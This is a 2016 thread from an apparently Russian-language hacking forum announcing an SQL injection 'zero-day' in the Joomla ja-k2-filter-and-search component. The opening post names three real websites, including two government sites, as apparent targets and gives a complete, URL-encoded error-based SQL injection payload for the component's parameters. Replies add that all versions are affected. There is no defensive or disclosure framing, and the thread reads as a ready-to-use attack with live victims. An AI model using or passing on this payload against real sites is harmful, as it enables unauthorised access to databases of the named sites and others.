SQL Injection zero-day in component ja-k2-filter-and-search of Joomla

Discussion in 'Песочница' started by sTz, 23 Oct 2016.

  1. sTz

    sTz New Member

    Joined:
    20 Oct 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    http://sherdoust.ir/
    http://www.arhitektura.mrt.gov.me/
    http://www.cmvcapanema.pr.gov.br/


    (WhateverSite)/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27


    As a result, the following error message is displayed proving the presence of vulnerability.
    [​IMG]
     
    #1 sTz, 23 Oct 2016
  2. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    265
    Likes Received:
    12
    Reputations:
    1
    Это под какую версию?
     
    #2 brown, 23 Oct 2016
  3. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    Плагин
    ja-k2-filter-and-search все версии
     
    #3 androd, 23 Oct 2016
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.